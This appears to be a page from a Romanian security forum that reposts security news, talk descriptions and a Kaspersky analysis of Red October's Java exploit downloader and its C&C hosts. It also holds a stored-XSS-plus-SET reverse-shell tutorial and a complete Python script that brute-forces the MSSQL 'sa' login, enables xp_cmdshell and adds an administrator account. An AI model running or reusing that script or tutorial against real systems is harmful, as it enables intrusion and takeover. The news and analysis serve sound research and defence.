Nytro

Whoa, imi arata hook-urile pe SSDT de la Kaspersky, me gusta

Lasa OOP-ul, PHP-ul si alte rahaturi, in primul rand, ca sa iei admiterea, trebuie sa stii C/C++ si algoritmica la un nivel decent. Apoi ai timp si de altele. Iti recomand insa sa te astepti si la multa matematica indesata pe gat, chiar si la admitere. PS: Cel putin asa e la Universitatea Bucuresti.

[h=1]Google Tracked Web Users Bypassing iPhone Security[/h] This is an era where innovative technologies hit the market on a regular basis. In fact, humans have been quite accustomed to the technological changes that take place so frequently. Also, lives of people have become too much dependent on these modern innovative technologies. Be it internet, mobile smartphone, or television media, people have become extremely intoxicated to using these devices. With enormous advantages of modern communication devices and internet, there is also some point of concern as well. Data breach, security hacking, and unethical business practices through the help of modern technologies have become more severe these days. Recently, Wall Street journal published an unethical business practice that is making waves in the mobile communication market. The journal accused major online advertising companies like Google for compromising the security settings of different iPhone as well Apple desktop users who runs the safari browser in their devices. Wall Street Journal not only accused Google but also other major online advertising firms like Point Roll, Vibrant Media, and WPP that used some specific code to trick the extremely popular web browser Safari. This allowed them to secretly monitor the behavior of the iPhone users by bypassing default security settings that has been designed in some particular manner to block such intrusions. In fact, bypassing security settings is not the correct approach to track user behavior or for understanding the commercial cycles. This attempt not only kept most of the iPhone and Safari Browser users in dark, but it all questioned the overall security and privacy policies of these notable advertisers. It can also be recalled that Apple’s privacy settings (default) definitely disallows any company to use cookies for tracking user behavior while using different web enabled services. However, notable advertisers like Google and others never took any time to think twice before breaching the security for mere commercial tracking purpose. And what for? To achieve some commercial gains! It's surely a rubbish and insulting approach from these notable advertisers. They should be sued for their conduct. Strong apology from these advertisers is expected. Well, an amazing fact is that till now Google or any of the other advertisers have never pledged for an apology regarding their unprofessional behavior. Isn't it funny? This means they will again carryout such activities in the near future. However, they have disabled the secret tracking code once Wall Street published about their dirty activities, but remained unapologetic. Instead, they tried to convince people with the fact that Wall Street misunderstood their approach completely. In a public statement, Google addressed that cookies used by them were not for tracking any sort of public behavior. In fact, those cookies were not powerful enough to collect any type of personal information. Other companies involved in such security breach issues also never admitted their guilt. Many of these advertisers said that they were totally unaware of such security breach or any of the illegal activities. There are many tech and web companies that offer free products and then earns through online advertising. But, also remember that these companies often try to act too smartly while trying to cross the privacy line of clients to learn about customer behavior. All for commercial gains, such approach may not help in creating a positive reputation for that particular company. Breaching security is a serious offense and can result in legal initiatives. About the author: Margaret is a blogger by profession. She loves writing, reading and travelling. She is an avid golfer and answers how much to ship golf clubs by suggesting Shipsticks golf. Sursa: Google Tracked Web Users Bypassing iPhone Security | Ethical Hacking-Your Way To The World Of IT Security

Facebook Graph Search may be a social engineering nightmare Facebook's new search engine serves up the kind of data that cyber scammers love By Ted Samson | InfoWorld Facebook's newly unveiled Graph Search search engine is an intriguing marriage of social networking and big data, creating opportunities for people to easily connect with prospective business partners, customers, friends, dates, and so on. At the same time, it's tough to ignore that Graph Search could be used as an on-tap source of social engineering data, which cyber scammers and malicious hackers could use and abuse in any number of ways. If you missed Facebook's big announcement about Graph Search, it's basically a Facebook search engine with which you can track down Facebook users who meet particular criteria (say, people who live in Chicago and are software developers). You can also search for pictures or businesses that meet particular criteria (such as "pictures of my friends at Disneyland" or "attorneys that my friends recommend.") Social engineering entails using personal details about a victim (where they work, where they went to school, who they're married to, what their interests are) to gain trust so that you can scam them, hack them, or otherwise take advantage. Hacking competitions in recent years have added social engineering events as the tactic has gained in popularity. Graph Search appears to be well suited for serving up the very data that scammer might use to dupe a target. Though Graph Search not yet available to users, Facebook is offering a glimpse of what it search might yield. Based simply on the outcome of a sample search, I could see how the tool could be used to quickly gather enough personal data about fellow Facebook users to successfully launch social-engineering-style attacks. For my sample search, I logged in with a bogus Facebook account I created long ago when I was interested in playing admittedly insipid Facebook games -- the ones that require you to have as many Facebook friends as possible in order to advance. I have around 445 friends on this account; I know there are other Facebook game-players with more -- as well as an underground market for such accounts. I clicked the sample Graph Search search button, and it looked up "people who live in my city." In this case, the city was New York, New York, per my account settings. The search results included a list of 12 people, none of whom I know in real life. As far as I can tell, they are all either Facebook friends or friends of friends. To me, they're all strangers on the Internet. Accompanying the dozen search results are the users' names and a profile picture, along with such data as where they live, how old they are, where they work or attend school, whether they are in a relationship, what sort of music they like, what interests they have, and the Facebook friends we have in common. All of that data could be used for social-engineering-style chicanery. Bear in mind, too, that this is a sample search, and I didn't even get to choose the criteria. As Facebook describes Graph Search, you'll be able to perform far more granular searches (searches for pictures with select people or searches for businesses your friends recommend), which can be useful but can also be wielded for potentially more pointed attacks. Facebook has stressed that the data that shows up in the Graph Search searches is data users have chosen to make public. But keep in mind: A lot of clueless, ignorant, and/or overly trusting users out there don't necessarily know how to protect themselves online, not even in a sandbox like Facebook where security controls aren't that hard to find. Here's what Facebook had to say about Graph Search and privacy: When you share something on Facebook, you get to decide exactly who can see that content. This, of course, is why Graph Search is such a powerful experience: A lot of what you will find is content that is not public, but content that someone has shared with a limited audience that happens to include you.... One challenge in particular is worth calling out. Consider the relatively simple Graph Search query, "Photos of Facebook employees." For starters, we make sure that only photos that the owner has shared with the person conducting the search can be seen on the photo results page. But we have also to make sure that each photo features at least one person who has shared with the searcher that they work at Facebook! Otherwise we would implicitly be revealing content that the searcher does not have access to. Although it's nice to know that Facebook is aware of the security challenge, one has to wonder whether the company will be able to maintain a handle on keeping private data private with so much data and so many "privacy checks" running in the background. Graph Search is slated for release this summer, with beta testing opening up to select users in the interim. Time will tell whether privacy and security concerns are warranted. This story, "Facebook Graph Search may be a social engineering nightmare," was originally published at InfoWorld.com. Get the first word on what the important tech news really means with the InfoWorld Tech Watch blog. For the latest developments in business technology news, follow InfoWorld.com on Twitter. Sursa: Facebook Graph Search may be a social engineering nightmare | Internet privacy - InfoWorld

Mai bine modifici /etc/hosts cu domeniile .geek, mai simplu. Asa putem face si noi domenii .rst.

Stored XSS And SET Stored XSS is the most dangerous type of cross site scripting due to the fact that the user can be exploited just by visiting the web page where the vulnerability occurs.Also if that user happens to be the administrator of the website then this can lead to compromise the web application which is one of the reasons that the risk is higher than a reflected XSS. In real world scenarios once a stored XSS vulnerability have discovered,the penetration tester reports the issue and provides a brief explanation in the final report about the potential risks but he doesn’t continue the attack as it is not necessary except if the client asks it.However a malicious attacker will not stop there and he will try to attack the users by combining tools and methods.So in this article we will examine how an attacker can use SET with a stored XSS in order to obtain shells from users. First of all stored XSS can be discovered in web applications that are allowing the users to store information like comments,message boards,page profiles,shopping carts etc.Let’s say that we have a web application with the following form: Comment Form Vulnerable to XSS In order to test it for XSS we will try to pass into the comment field the following script: Alert Box – JavaScript Code The result will be the following: Comment Field Vulnerable to XSS Now that we know where the vulnerability exists we can launch the social engineering toolkit. SET – Menu The attack that we are going to choose is the Java Applet Attack Method. Java Applet Attack Method We will enter our IP address in order the reverse shell to connect back to us and we will choose the first option which is Java Required. SET Configurations Next we will have to choose our payload and our encoder.In this case we will select to use as a payload a simple Meterpreter Reverse TCP and as a encoder the famous shikata_ga_nai. SET – Encoders Now we can go back to the web application and we can try to insert the malicious JavaScript code in the comment field that we already know from before that is vulnerable to XSS. Malicious JavaScript Code When a user will try to access the page that contains the malicious JavaScript the code will executed in his browser and a new window will come up that will contain the following message: Fake message trying to convince the user to run the java applet After a while the user will notice a pop-up box that it will ask him if he wants to run the Java applet. Malicious Java Applet If the user press on the Run button the malicious code will executed and it will return us a shell. Remote Shell Conclusion As we saw stored XSS can be very dangerous as the JavaScript code executed once the unsuspected user has visited the vulnerable page.In this article the malicious attacker wanted to redirect the user to another page in order to run the malicious Java applet that lead to a shell.A potential attacker can use many tools with different arbitrary codes combined together in order to achieve his goal so regular penetration tests is a necessity for every company that wants to defend herself from non-ethical hackers. Sursa: Stored XSS And SET

SQL Brute Force Script The purpose of this script is to perform a brute force attack on an SQL database.The script will try to connect to the remote host with the administrative account sa and with one password that will be valid from the file pass.txt.If the connection is successful then it will try to enable the xp_cmdshell and add a new user on the remote host. Author: Larry Spohn Website: http://e-spohn.com Twitter: @Spoonman1091 Credits: Dave Kennedy #!/usr/bin/python import _mssql # mssql = _mssql.connect('ip', 'username', 'password') # mssql.execute_query() passwords = file("pass.txt", "r") ip = "192.168.200.128" for password in passwords: password = password.rstrip() try: mssql = _mssql.connect(ip, "sa", password) print " [*] Successful login with username 'sa' and password: " + password print " [*] Enabling 'xp_cmdshell'" mssql.execute_query("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell', 1;RECONFIGURE;") mssql.execute_query("RECONFIGURE;") print " [*] Adding Administrative user" mssql.execute_query("xp_cmdshell 'net user netbiosX Password! /ADD && net localgroup administrators netbiosX /ADD'") mssql.close() print " [*] Success!" break except: print "[!] Failed login for username 'sa' and password: " + password Sursa: SQL Brute Force Script

[TABLE] [TR] [TD][TABLE=width: 100%] [TR] [TD]Dll Hijack Auditor is the smart tool to Audit against the Dll Hijacking Vulnerability in any Windows application. This is one of the critical security issue affecting almost all Windows systems. Though most of the apps have been fixed, but still many Windows applications are susceptible to this vulnerability which can allow any attacker to completely take over the system. [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD] DllHijackAuditor helps in discovering all such Vulnerable Dlls in a Windows application which otherwise can lead to successful exploitation resulting in total compromise of the system. With its simple GUI interface DllHijackAuditor makes it easy for anyone to instantly perform the auditing operation. It also presents detailed technical Audit report which can help the developer in fixing all vulnerable points in the application. [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]DllHijackAuditor is a standalone portable application which also comes with Installer for local Installation & Uninstallation of software. It works on wide range of platforms starting from Windows XP to latest operating system, Windows 8.[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader]Features [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]Here are some of the smart features of DllHijackAuditor,[/TD] [/TR] [TR] [TD] Directly & Instantly audit any Windows Application. Allows complete testing to uncover all Vulnerable points in the target Application Smart Debugger based 'Interception Engine' for consistent and efficent performance without intrusion. Support for specifying as well as auditing of application with custom & multiple Extensions. Timeout Configuration to alter the waiting time for each Application. Generates complete auditing report (in HTML format) about all vulnerable hijack points in the Application. GUI based tool, makes it easy for anyone with minimum knowledge to perform the auditing operation. Does not require any special privilege for auditing of the application (unless target application requires) Free from Antivirus as it does not use any shellcodes or exploit codes which trigger Antivirus to terminate the operation. Fully portable tool which can be run directly on any system. Support for local Installation and uninstallation of the software. [/TD] [/TR] [/TABLE] Download: http://securityxploded.com/dllhijackauditor.php

Another Java exploit is on sale for $5,000 Criminals hit Java again just 24 hours after patch By Alastair Stevenson Wed Jan 16 2013, 16:55 ANOTHER EXPLOIT aimed at Oracle's Java software has appeared just days after the company rushed out a patch to fix a previous vulnerability. The exploit was detected on Wednesday by Krebsonsecurity and reportedly takes advantage of another zero day vulnerability in Java. "On Monday, an administrator of an exclusive cybercrime forum posted a message saying he was selling a new Java 0day to a lucky two buyers. The cost: starting at $5,000 each," wrote Brian Krebs. "The hacker forum admin's message promised weaponized and source code versions of the exploit. This seller also said his Java 0day - in the latest version of Java (Java 7 Update 11) - was not yet part of any exploit kits, including the Cool Exploit Kit." If accurate, then the zero day vulnerability will be the second discovered this year. The first vulnerability was discovered after researchers spotted a ransomware Trojan known as Reveton targeting the flaw. Unlike the alleged new attack, the original vulnerability was linked with the popular Blackhole and Cool exploit kits. The kits are infamous toolkits traded on the black market that enable cybercriminals to mount automated attacks. The first attack led to widespread calls within the security industry for internet users to turn Java off. The warnings reached near panic levels when the US Computer Emergency Response Team (CERT) again recommended that internet users shut the software down mere days after Oracle released its security update. Despite the security fears some companies have noted that simply turning Java off might not be an option for large businesses. Krebbs was quick to reiterate this sentiment, noting that Java web apps were never designed for use in consumer transactions. "Much of the advice on how to lock down Java on consumer PCs simply doesn't scale in the enterprise, and vice-versa," wrote Krebbs. "Oracle's unprecedented four-day turnaround on a patch for the last zero-day flaw notwithstanding, the company lacks any kind of outward sign of awareness that its software is so broadly installed on consumer systems. "Oracle seems to be sending a message that it doesn't want hundreds of millions of consumer users; those users should listen and respond accordingly." At the time of publishing Oracle had not responded to a request from The INQUIRER for comment on the reported new Java vulnerability Sursa: Another Java exploit is on sale for $5,000- The Inquirer

DefenseCode Warns of Linksys Router Security Flaw The researchers say they told Cisco about the vulnerability, but were informed it was already fixed. It wasn't. By Jeff Goldman | January 16, 2013 DefenseCode researchers recently uncovered a zero day vulnerability in Linksys routers. "Cisco Linksys is a very popular router with more than 70,000,000 routers sold," the researchers wrote. "That's why we think that this vulnerability deserves attention." "DefenseCode said the flaw is in the default installation of Linksys routers, which are primarily used in home networks," writes CSO Online's Antone Gonsalves. "The company showing a proof-of-concept exploit being used to gain root access to a Linksys model WRT54GL router." "They contacted Cisco and shared a detailed vulnerability description along with the PoC exploit for the vulnerability," writes Help Net Security's Mirko Zorz. "Cisco claimed that the vulnerability was already fixed in the latest firmware release, which turned out [to] be incorrect." "The vulnerability affects all versions of Linksys firmware up to and including the current version, 4.30.14," notes The Register's Richard Chirgwin. "DefenseCode intends to release a full description of the vulnerability within two weeks." "A patch is due out this week, days ahead of DefenseCode's scheduled release of the full vulnerability details," notes SC Magazine's Darren Pauli. Sursa: DefenseCode Warns of Linksys Router Security Flaw - eSecurity Planet

Wireless Beacon Fuzzing Using Metasploit Description: In this video I will show you how to perform Fuzzing on wireless using Metasploit Framework. For this attack use Backtrack 5 R2 and install Lorcon 2. After launching the attack this module will start fuzzing AP and other devices and AP will not send anymore request to others, If you start monitoring the air you can see there are lots of Corrupted Fake Access Point so This module sends out corrupted beacon frames. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Wireless Beacon Fuzzing Using Metasploit

Security Evaluation Of Russian Gost Cipher Description: In this talk we will survey some 30 recent attacks on the Russian GOST block cipher. Background: GOST cipher is the official encryption standard of the Russian federation, and also has special versions for the most important Russian banks. Until 2012 there was no attack on GOST when it is used in encryption with random keys. I have developed more than 30 different academic attacks on GOST the fastest has complexity of 2^118 to recover some but not all 256-bit keys generated at random, which will be presented for the first time at CCC conference. It happens only once per decade that a government standard is broken while it is still an official government standard (happened for DES and AES, no other cases known). All these are broken only in academic sense, for GOST most recent attacks are sliding into maybe arguably practical in 30 years from now instead of 200 years... Our earlier results were instrumental at ISO for rejecting GOST as an international encryption standard last year. Not more than 5+ block cihers have ever achieved this level of ISO standardisation in 25 years and it NEVER happended in history of ISO that a cipher got broken during the standardization process. Two main papers with 70+30 pages respectively which are Cryptology ePrint Archive: Report 2011/626 and Cryptology ePrint Archive: Report 2012/138. Two other papers have been already published in Cryptologia journal which specializes in serious military and government crypto. The talk will cover three main families of attacks on GOST: high-level transformations, low- level inversion/MITM/guess-then-software/algebraic attacks and advanced truncated differential cryptanalysis of GOST. Plan for the talk: First I cover the history of GOST with major Cold War history events as the necessary background. Then I describe in details three main families of attacks: 1) self-smilarity attacks which generalize slide fixed point and reflection attacks, and provide a large variety of ways in which the security of the full GOST cipher with 32 rounds can be reduced to the security of GOST with 8 rounds in a black box reduction and thus the task of the cryptanalys is split into two well-defined tasks. 2) detailed software/algebraic and MITM attacks on 8 rounds and how weak diffusion in GOST helps. 3) advanced truncated differential attacks on GOST Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Security Evaluation Of Russian Gost Cipher

Brute Force Attack On Truecrypt Description: In this video I will show you how to perform a brute-force attack on encrypted truecrypt file or drive. You need one tool called tc-guessus and one wordlist. This tool is very simple and easy to use if your password is in the word list so you can crack the file easily. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Brute Force Attack On Truecrypt

Ethics In Security Research Description: Recently, several research papers in the area of computer security were published that may or may not be considered unethical. Looking at these borderline cases is relevant as today's research papers will influence how young researchers conduct their research. In our talk we address various cases and papers and highlight emerging issues for ethic committees, internal review boards (IRBs) and senior researchers to evaluate research proposals and to finally decide where they see a line that should not be crossed. For researchers in computer security the recent success of papers such as [KKL+09] are an incentive to follow along a line of research where ethical questions become an issue. In our talk at the conference we will address various cases and papers and provide possible guidelines for ethic committees, internal review boards (IRBs) and senior researchers to evaluate research proposals and to finally decide where they see a line that should not be crossed. While some actions might not be illegal they still may seem unethical. Key phrases that would be addressed in the discussion: (1) Do not harm users actively, (2) Watching bad things happening, (3) Control groups, (4) Undercover work. In the following, we introduce some lines of thought that should be discussed throughout the talk: A first and seemingly straightforward principle is that researchers should not actively harm others. So deploying malware or writing and deploying new viruses is obviously a bad idea. Is it, however, ok to modify malware? Following the arguments of [KKL+08], one would not create more harm if, for instance, one would instrumentalized a virus so that it sends us statistical data about its host. Such a modification could be made by the ISP or the network administrators at a university network. If this modification makes the virus less likely to be detected by anti-virus software, the case, however, changes. Then this is analogous to distributing a new virus. A few quick lab experiments have shown that malware that is detected by virus scanners is very often not picked up after it has been modified. Stealing a user's computing and networking resources may harm her; however, if some other malware already steals the resources one could argue that the damage is less since the researcher's software does "less bad things". This is basically what the authors of [KKL+08] argue. So when taking over a botnet, generating additional traffic would not be permissible whereas changing traffic would be. The real-world analogue is that you see someone breaking in a house, you scare the person away and then you go in and only look around, for instance, to understand how the burglar selected the target and what he was planning to steal, which is "less bad" than the stealing what the burglar was probably planning to do. There is a line of research when researchers only passively observe malware and phishing without modifying any content or receivers. When thinking of research ethics of "watching what happens", the Tuskegee Study of Syphilis [W1] comes to mind. Patients were not informed about available treatments, no precautions were taken that patients did not infect others, and they were also actively given false information regarding treatment. Today it is obvious that the study is unethical. As done in [bSBK09] the best way is to ask people for their consent prior to the experiment. In other studies, involving, for instance, botnets, this procedure may be impossible as a host computer can only be contacted after sending modified messages. In a botnet study such as [sGCC+09] it seems both feasible and responsible to inform a user that her computer is part of a botnet. However obvious this may seem, there might be multiple users on an infected machine and informing an arbitrary user could cause some additional harm. For instance, the infection of an office computer may have been caused by deactivating the anti-virus software, surfing to Web pages not related to work, etc. Thus informing one person could cause another person to lose his job. While this is not as extreme as the "Craiglist experiment" [W2] similar impacts are conceivable. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Ethics In Security Research

How I Met Your Pointer Description: An approach to the problem of fuzzing proprietary protocols will be shown, focusing on network protocols and native software. In the course of this talk I will combine several methods in order to force the client software to work as a "double agent" against the server. An interesting approach to the problem of fuzzing proprietary protocols will be presented. Since the method is applicable to several kinds of software and in order to keep an example in mind through all the talk, I will be focusing on network protocols and native software. The main idea behind it is very simple: "in a client/server architecture, the client knows how the protocol works." In the course of this talk I will need to combine several methodologies in order to "force" the client software to work as a "double agent" against the server. Advanced hooking, dynamic binary instrumentation and differential debugging are among the topics discussed here. The talk includes a live demo of this method in which a small program implementing a proprietary protocol will be fuzzed (without knowledge of it) and a memory corruption will be found. Last but not least, the talk is written in a very amusing style with multiple references to "nerd culture" and interacting with the audience to make the (hard) topic as interesting and entertaining as it can be. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: How I Met Your Pointer

Red October - Java Exploit Delivery Vector Analysis GReAT Kaspersky Lab Expert Posted January 16, 13:00 GMT Since the publication of our report, our colleagues from Seculert have discovered and posted a blog about the usage of another delivery vector in the Red October attacks. In addition to Office documents (CVE-2009-3129, CVE-2010-3333, CVE-2012-0158), it appears that the attackers also infiltrated victim network(s) via Java exploitation (MD5: 35f1572eb7759cb7a66ca459c093e8a1 - 'NewsFinder.jar'), known as the 'Rhino' exploit (CVE-2011-3544). We know the early February 2012 timeframe that they would have used this technique, and this exploit use is consistent with their approach in that it's not 0-day. Most likely, a link to the site was emailed to potential victims, and the victim systems were running an outdated version of Java. However, it seems that this vector was not heavily used by the group. When we downloaded the php responsible for serving the '.jar' malcode archive, the line of code delivering the java exploit was commented out. Also, the related links, java, and the executable payload are proving difficult to track down to this point. The domain involved in the attack is presented only once in a public sandbox at malwr.com (Malwr - Analysis of c3b0d1403ba35c3aba8f4529f43fb300), and only on February 14th, the very same day that they registered the domain hotinfonews.com: [COLOR=#1f497d]Domain Name: HOTINFONEWS.COM Registrant: Privat Person Denis Gozolov (gozolov@mail.ru) Narva mnt 27 Tallinn Tallinn,10120 EE Tel. +372.54055298 Creation Date: 14-Feb-2012 Expiration Date: 14-Feb-2013 [/COLOR] Following that quick public disclosure, related MD5s and links do not show up in public or private repositories, unlike the many other Red October components. We could speculate that the group successfully delivered their malware payload to the appropriate target(s) for a few days, then didn't need the effort any longer. Which may also tell us that this group, which meticulously adapted and developed their infiltration and collection toolset to their victims' environment, had a need to shift to Java from their usual spearphishing techniques in early February 2012. And then they went back to their spear phishing. Also of note, there was a log recording three separate victim systems behind an IP address in the US, each connecting with a governmental economic research institute in the Middle East. So, this Java Rhino exploit appears to be of limited use. And, the functionality embedded on the server side PHP script that delivers this file is very different from the common and related functionality that we see in the backdoors used throughout the five year campaign. The crypto routines maintained and delivered within the exploit itself are configured such that the key used to decrypt the URL strings within the exploit is delivered within the Java applet itself. Here is our PHP encryption routine to encrypt the Url for the downloader content: And this is the function to embed the applet in the HTML, passing the encrypted URL string through parameter 'p': Here is the code within the applet that consumes the encrypted strings and uses it. The resulting functionality downloads the file from the URL and writes it to 'javaln.exe'. Notice that the strb and stra variables maintain the same strings as the $files and $charset variables in the php script: This "transfer" decryption routine returns a URL that is concatenated with the other variables, resulting in "hXXp://www.hotinfonews.com/news/dailynews2.php?id=&t=win". It is this content that is written to disk and executed on the victim's machine. A description of that downloader follows. It is most interesting that this exploit/php combination's encryption routine is different from the obfuscation commonly used throughout Red October modules. It further suggests that potentially this limited use package was developed separately from the rest for a specific target. 2nd stage of the attack: EXE, downloader The second stage of the attack is downloaded from "http://www.hotinfonews.com/news/dailynews2.php" and executed by the payload of the Java exploit. It acts as a downloader for the next stage of the attack. Known file location: %TEMP%\javaln.exe MD5: c3b0d1403ba35c3aba8f4529f43fb300 The file is a PE EXE file, compiled with Microsoft Visual Studio 2008 on 2012.02.06. The file is protected by an obfuscation layer, the same as used in many Red October modules. Obfuscation layer disassembled The module creates a mutex named "MtxJavaUpdateSln" and exits if it already exists. After that, it sleeps for 79 seconds and then creates one of the following registry values to be loaded automatically on startup: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] JavaUpdateSln=%full path to own executable% [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] JavaUpdateSln=%full path to own executable% Then, after a 49 second delay, it enters an infinite loop waiting for a working Internet connection. Every 67 seconds it sends a HTTP POST request to the following sites: Microsoft Home Page | Devices and Services update.microsoft.com Google Once a valid connection is established, it continues to its main loop. C&C server connection loop Every 180 seconds the module sends a HTTP POST request to its C&C server. The request is sent to a hardcoded URL: www.dailyinfonews.net/reportdatas.php The contents of the post request follow the following format: id=%unique user ID, retrieved from the overlay of the file%& A=%integer, indicates whether the autorun registry key was written%& B=%0 or 1, indicates if user has administrative rights%& C=%integer, level of privilege assigned to the current user% [TABLE=width: 100%] [TR] [TD=align: left]00000000 50 4f 53 54 20 68 74 74 70 3a 2f 2f 77 77 77 2e |POST http://www.| 00000010 64 61 69 6c 79 69 6e 66 6f 6e 65 77 73 2e 6e 65 |dailyinfonews.ne| 00000020 74 3a 38 30 2f 72 65 70 6f 72 74 64 61 74 61 73 |t:80/reportdatas| 00000030 2e 70 68 70 20 48 54 54 50 2f 31 2e 30 0d 0a 48 |.php HTTP/1.0..H| 00000040 6f 73 74 3a 20 77 77 77 2e 64 61 69 6c 79 69 6e |ost: www.dailyin| 00000050 66 6f 6e 65 77 73 2e 6e 65 74 3a 38 30 0d 0a 43 |fonews.net:80..C| 00000060 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 36 |ontent-length: 6| 00000070 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a |2..Content-Type:| 00000080 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 | application/x-w| 00000090 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 |ww-form-urlencod| 000000a0 65 64 0d 0a 0d 0a 69 64 3d 41 41 41 39 33 39 35 |ed....id=AAA9395| 000000b0 37 35 32 39 35 33 31 32 35 30 35 31 34 30 32 36 |7529531250514026| 000000c0 31 30 30 36 43 43 43 39 33 33 30 30 39 42 42 42 |1006CCC933009BBB| 000000d0 31 36 35 34 31 35 31 33 26 41 3d 31 26 42 3d 31 |16541513&A=1&B=1| 000000e0 26 43 3d 32 |&C=2| [/TD] [/TR] [/TABLE] HTTP POST request sent to the C&C server The module decrypts the C&C response with AMPRNG algorithm using a hardcoded key. Then, it checks if there is a valid EXE signature ("MZ") at offset 37 in the decrypted buffer. If the signature is present, it writes the EXE file to "%TEMP%\nvsvc%p%p.exe" (%p depends on system time) and executes it. 3rd stage of the attack: EXE, unknown Currently, the C&C server is unavailable and we do not have the executables that were served to the "javaln.exe" downloader. Most likely, they were the actual droppers, similar to the ones used with Word and Excel exploits. Conclusions As more information about the Red October becomes available and third parties are publishing their own research into the attacks, it becomes clear that the scope of the operation is bigger than originally thought. In addition to the Java exploit presented here, it's possible that other delivery mechanisms were used during the 5 years since this gang was active. For instance, we haven't seen any PDF exploits yet, which are very popular with other groups - an unusual thing. We will continue to monitor the situation and publish updates as the story uncovers. Sursa: Red October - Java Exploit Delivery Vector Analysis - Securelist

Security audit finds dev OUTSOURCED his JOB to China to goof off at work Cunning scheme netted him 'best in company' awards By Iain Thomson in San Francisco Posted in Business, 16th January 2013 A security audit of a US critical infrastructure company last year revealed that its star developer had outsourced his own job to a Chinese subcontractor and was spending all his work time playing around on the internet. The firm's telecommunications supplier Verizon was called in after the company set up a basic VPN system with two-factor authentication so staff could work at home. The VPN traffic logs showed a regular series of logins to the company's main server from Shenyang, China, using the credentials of the firm's top programmer, "Bob". "The company's IT personnel were sure that the issue had to do with some kind of zero day malware that was able to initiate VPN connections from Bob's desktop workstation via external proxy and then route that VPN traffic to China, only to be routed back to their concentrator," said Verizon. "Yes, it is a bit of a convoluted theory, and like most convoluted theories, an incorrect one." After getting permission to study Bob's computer habits, Verizon investigators found that he had hired a software consultancy in Shenyang to do his programming work for him, and had FedExed them his two-factor authentication token so they could log into his account. He was paying them a fifth of his six-figure salary to do the work and spent the rest of his time on other activities. The analysis of his workstation found hundreds of PDF invoices from the Chinese contractors and determined that Bob's typical work day consisted of: 9:00 a.m. – Arrive and surf Reddit for a couple of hours. Watch cat videos 11:30 a.m. – Take lunch 1:00 p.m. – Ebay time 2:00-ish p.m – Facebook updates, LinkedIn 4:30 p.m. – End-of-day update e-mail to management 5:00 p.m. – Go home The scheme worked very well for Bob. In his performance assessments by the firm's human resources department, he was the firm's top coder for many quarters and was considered expert in C, C++, Perl, Java, Ruby, PHP, and Python. Further investigation found that the enterprising Bob had actually taken jobs with other firms and had outsourced that work too, netting him hundreds of thousands of dollars in profit as well as lots of time to hang around on internet messaging boards and checking for a new . Bob is no longer employed by the firm. ® Sursa: Security audit finds dev OUTSOURCED his JOB to China to goof off at work • The Register Smecher tipu

[h=2]Cyberwar’s Gray Market[/h][h=1]Should the secretive hacker zero-day exploit market be regulated?[/h] By Ryan Gallagher|Posted Wednesday, Jan. 16, 2013 Behind computer screens from France to Fort Worth, Texas, elite hackers hunt for security vulnerabilities worth thousands of dollars on a secretive unregulated marketplace. Using sophisticated techniques to detect weaknesses in widely used programs like Google Chrome, Java, and Flash, they spend hours crafting “zero-day exploits”—complex codes custom-made to target a software flaw that has not been publicly disclosed, so they can bypass anti-virus or firewall detection to help infiltrate a computer system. Like most technologies, the exploits have a dual use. They can be used as part of research efforts to help strengthen computers against intrusion. But they can also be weaponized and deployed aggressively for everything from government spying and corporate espionage to flat-out fraud. Now, as cyberwar escalates across the globe, there are fears that the burgeoning trade in finding and selling exploits is spiralling out of control—spurring calls for new laws to rein in the murky trade. Advertisement Some legitimate companies operate in a legal gray zone within the zero-day market, selling exploits to governments and law enforcement agencies in countries across the world. Authorities can use them covertly in surveillance operations or as part of cybersecurity or espionage missions. But because sales are unregulated, there are concerns that some gray market companies are supplying to rogue foreign regimes that may use exploits as part of malicious targeted attacks against other countries or opponents. There is also an anarchic black market that exists on invite-only Web forums, where exploits are sold to a variety of actors—often for criminal purposes. The importance of zero-day exploits, particularly to governments, has become increasingly apparent in recent years. Undisclosed vulnerabilities in Windows played a crucial role in how Iranian computers were infiltrated for surveillance and sabotage when the country’s nuclear program was attacked by the Stuxnet virus (an assault reportedly launched by the United States and Israel). Last year, at least eight zero days in programs like Flash and Internet Explorer were discovered and linked to a Chinese hacker group dubbed the “Elderwood gang,” which targeted more than 1,000 computers belonging to corporations and human rights groups as part of a shady intelligence-gathering effort allegedly sponsored by China. The most lucrative zero days can be worth hundreds of thousands of dollars in both the black and gray markets. Documents released by Anonymous in 2011 revealed Atlanta-based security firm Endgame Systems offering to sell 25 exploits for $2.5 million. Emails published alongside the documents showed the firm was trying to keep “a very low profile” due to “feedback we've received from our government clients.” (In keeping with that policy, Endgame didn’t respond to questions for this story.) But not everyone working in the business of selling software exploits is trying to fly under the radar—and some have decided to blow the whistle on what they see as dangerous and irresponsible behavior within their secretive profession. Adriel Desautels, for one, has chosen to speak out. The 36-year-old “exploit broker” from Boston runs a company called Netragard, which buys and sells zero days to organizations in the public and private sectors. (He won’t name names, citing confidentiality agreements.) The lowest-priced exploit that Desautels says he has sold 